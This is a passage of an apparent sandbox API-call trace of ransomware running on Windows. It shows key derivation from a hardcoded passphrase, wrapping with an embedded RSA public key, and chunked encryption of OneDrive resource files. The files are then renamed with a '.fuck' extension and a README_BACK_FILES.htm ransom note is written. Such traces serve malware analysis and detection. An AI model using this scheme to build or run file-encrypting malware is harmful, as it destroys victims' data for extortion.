lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.301] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x148, lpOverlapped=0x0) returned 1 [0276.301] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x148, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x150) returned 1 [0276.302] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0276.302] CloseHandle (hObject=0x5d3c) returned 1 [0276.302] CloseHandle (hObject=0x5d48) returned 1 [0276.302] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.311] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.311] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.314] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.316] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0276.316] CryptDestroyKey (hKey=0x2fb548) returned 1 [0276.316] CryptReleaseContext (hProv=0x2f2a960, dwFlags=0x0) returned 1 [0276.316] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.316] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0276.316] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\readme_back_files.htm")) returned 0xffffffff [0276.316] AreFileApisANSI () returned 1 [0276.316] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0276.316] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ha-latn-ng\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ha-latn-ng\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.317] GetFileType (hFile=0x5d4c) returned 0x1 [0276.318] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.320] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.320] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0276.321] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.321] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.321] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.321] GetLastError () returned 0x0 [0276.321] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.322] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.322] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.324] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\he\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.325] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\he\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.325] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a960) returned 1 [0276.327] CryptCreateHash (in: hProv=0x2f2a960, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.327] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0276.327] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.327] CryptDeriveKey (in: hProv=0x2f2a960, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb308) returned 1 [0276.327] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.328] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.328] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b620) returned 1 [0276.328] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b620, dwCertEncodingType=0x1, pInfo=0x2f35f80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35fb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35fb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb3c8) returned 1 [0276.328] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.328] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b7b8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b7b8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.328] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2b7b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b7b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.329] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.339] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.339] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.348] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.349] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.349] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.349] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.349] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.349] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.349] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.349] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.349] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.349] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.349] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.349] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.350] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.350] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.350] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.350] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.350] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.350] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.350] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.350] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.350] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.350] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.351] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.351] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.351] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.351] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.351] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.352] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.352] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.352] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.352] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.352] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.352] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.353] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.353] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 